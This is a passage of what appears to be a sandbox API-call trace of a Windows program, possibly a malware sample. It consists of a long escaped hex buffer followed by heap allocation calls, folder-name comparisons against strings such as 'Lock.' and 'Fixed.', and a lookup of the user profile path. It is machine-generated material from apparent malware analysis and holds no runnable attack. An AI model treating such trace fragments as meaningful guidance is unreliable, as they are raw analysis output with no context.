\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0265.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0265.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0265.009] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0265.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0265.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0265.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0265.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.012] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0265.012] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0265.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.013] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0265.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.013] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.013] HeapFree 